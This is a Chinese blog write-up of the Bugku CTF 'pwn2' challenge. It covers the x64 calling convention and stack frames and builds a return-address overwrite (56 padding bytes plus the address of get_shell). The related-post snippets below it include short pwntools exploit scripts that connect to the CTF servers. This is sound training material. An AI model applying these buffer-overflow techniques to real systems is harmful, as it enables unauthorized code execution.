ctf.bugku ctf题目详解——pwn2

最新推荐文章于 2022-04-27 20:46:55 发布
最新推荐文章于 2022-04-27 20:46:55 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yeshen4328/article/details/106363576
版权

ctf.bugku ctf题目详解——pwn2

题目

在这里插入图片描述
程序分配了一个栈上的变量s,长度为0x30,并一开始置0.
9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。

同时使用ida打开程序之后发现还存在一个get_shell的函数:
在这里插入图片描述
于是我们需要想方法利用溢出来调用这个get_shell函数。

x64函数调用规则

解题之前我们先学习下linux x64的函数调用规则。
x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈中,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器中,然后一次入栈h、g。

保存完参数之后再把函数后面一条指令的地址入栈保存。

栈顶指针(寄存器):rsp
栈底指针(帧指针):rbp

栈结构

在这里插入图片描述
上图就是一个函数的栈结构,上面是栈顶,下面是栈底,栈顶是低地址,栈底是高地址,read函数往栈中写数据是从栈顶往栈底写入,如图所示。

其他指令

leave:leave指令的作用是把rsp指向rbp,然后将此时栈顶的元素pop到rbp。
一般是在函数体末尾,ret前调用,该函数这样做的目的是恢复函数栈帧。所以通过把rsp指向rbp来释放创建的栈空间。
ret:ret指令是把当前栈顶元素pop出来放到rip寄存器去进行函数跳转,目的是把函数调用前保存的返回地址给恢复出来,让代码运行到函数调用的地方。

以上是解本题可能用到的知识

解题

在这里插入图片描述
程序首先分配了0x30的栈空间给变量s,从上面汇编可以看出,rbp-0x30的地址被赋值到了rdi,也就是memset的第一个参数。
我们使用gdb运行pwn2,查看实时的栈结构来分析:
在这里插入图片描述
当运行到memset时,栈结构和寄存器如图所示,其中rdi保存了数组s的地址,也就是0x00007fffffffe190,对应到栈结构,刚好是栈顶,分配长度为0x30,刚好8行,如红框。
在这里插入图片描述
运行完read之后,我输入了0x30个a,刚好把s填满。

我们知道main函数也是个函数,在main被调用时,外面的代码也会把返回地址给入栈,然后跳转到main中,从上面栈可以看到,猜测红色字体0x40070a的就是返回地址,我们可以把get_shell的地址写入到这个位置,当main返回时,便会返回到get_shell中去,实现目标代码执行。

但是我尝试之后发现并不行,我忽略了ret前的leave指令,他会把rsp指向rbp,然后把rbp弹出,这样运行到ret指令时,rbp指向的就是第二个红色的地址了:
在这里插入图片描述
所以我们覆盖的返回应该是到0x00007fffffffe1c8这个位置,所以我们的输入可以是‘a’*56+’’’\x51\x07\x40\x00\x00\x00\x00\x00’,其中前面56个a就是用来填充变量s以及0x00007fffffffe1c0的,后面这个地址就是get_shell的函数地址小端法表示。

在这里插入图片描述
运行:
在这里插入图片描述

yeshen4328
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二进制反汇编、密码学、隐写术等。每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得积分。比赛通常在一定的时间内进行,参赛者可以单独或组队参加。 此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,能够帮助参赛者提高解决问题的能力和团队协作能力。 CTF题库是学习和提高网络安全技能的极好途径。它们提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。如果您对网络安全感兴趣,请尝试参加一个CTF比赛或挑战集,它们将为您提供有趣和具有挑战性的体验。
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 372
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
bugku-pwn2
ro4lsc的博客
05-31 548
pwn2 首先我对pwn题完全没有了解,真萌新,所以就刷刷最基础的题目吧。 我是使用了pwndocker,第一次用没啥感觉。 docker exec -it mypwn /bin/bash wget https://ctf.bugku.com/files/ad67ac41b68c70c40d90bce4a39796e4/pwn2 checksec pwn2 这个东西我暂时看不懂,只知道这个pwn2是个64位程序 用IDA打开,找到main函数F5 int __cdecl main(int argc,
BugKu - pwn2
Casuall的博客
07-06 3642
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
Bugku pwn2
、moddemod
05-26 425
pwn2 题目 chmod +x pwn2 这里都关闭了,栈上可执行! 这个程序里面直接留了后门get_shell_ 思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可, 即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
ctf.rar_ctf
09-21
this is script from my ctf
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
CTF.rar_ctf_seed7rj
09-21
CEUCE T FEHRENHET CNVERTER
bugku pwn2
doudoudedi
06-04 1685
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
bugke pwn2
weixin_33858336的博客
06-05 289
根据伪代码可以看到read函数存在溢出 存在一个后面 那就直接覆盖返回地址就完事了 从ida很直观看出s的偏移为0x30 所以到到返回地址的距离就是0x30+0x8 from pwn import *#p = process('./pwn2')p=remote('114.116.54.89','10003')elf = ELF('./pwn2')flag = elf.symb...
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 272
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
ctf pwn 题目
m0_64195960的博客
04-11 1300
2022年3月21栈迁移 这道题是栈迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的栈迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
CTF-bugku
leetcode
09-12 289
CTF入门-Bugku-web1.get2.post3.矛盾4.域名解析5.你必须让它停下 1.get 在url中添加?what=flag,出现flag 2.post 法1:hackbar firefox破解版:https://blog.csdn.net/qq_41617034/article/details/90647081#Firefox%E7%9A%84%E8%AF%B7%E7%82%B9%...
bugku_pwn2 | by AriSan
AriSan_XD的博客
05-02 250
bugku_pwn2栈溢出入门 | AriSan 看源码,非常明显的栈溢出 直接有后门函数 checksec后没有任何保护 使用 gdb调试,在 read 函数处下断点,运行,因为是64位的程序,得到栈空间为 RBP-RSI+8=0x70-0x40+8=56 使用垃圾数据填满栈空间后,覆盖返回地址为后门函数地址,直接执行后门函数 成功 exp: from pwn import * p ...
bugku-pwn2-wp
weixin_45427676的博客
04-05 333
下载完题后先在VM中checksec查看保护机制 基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数 可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。 在main函数下面有一个get_shell_()函数,打开看一下 有一个system(“cat fl...
记一次bugku pwn题解4月27日
z1r0的博客
04-27 490
记一次bugku pwn题解4月27日 emmmm,远程环境很垃圾(2.19-0ubuntu6.15),笔者patchelf的时候才想起来没有2.19,所以直接用2.23。利用realloc调整了好多次都打不通。。。。。换了四次gadget从0一直测试到realloc+0x30。。。。(没意思,其实可以利用其他方式,比如fsop,当时想着可能马上就可以通了就没有再高兴换了。。 uaf漏洞一枚,还可以edit,直接fastbin attack乱杀。快速写完初始exp发现了一个很ganga的事情,打不通本地和
CTF - bugku-分析
aon8069924165211的博客
09-22 537
1.flag被盗 下载链接是.pcang文件 用wireshark打开 像这种流量分析题目,就要用Wireshark自带的搜索功能找尝试查找一些关键词(比如key、flag、shell、pass等) 右击追踪数据流 拿到flag{This_is_a_f10g} 2.中国菜刀 菜刀是一个连后门木马的工具。 题目链接下载下来是一个.pcang...
ctf.unitypackage
最新发布
08-20
ctf.unitypackage是一个Unity引擎中的游戏开发资源包。CTF是Capture The Flag的缩写,意为夺旗战。这个资源包里包含了一系列用于开发夺旗战游戏的资源和工具。 夺旗战是一种常见的多人游戏模式,参与者组成两个团队...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值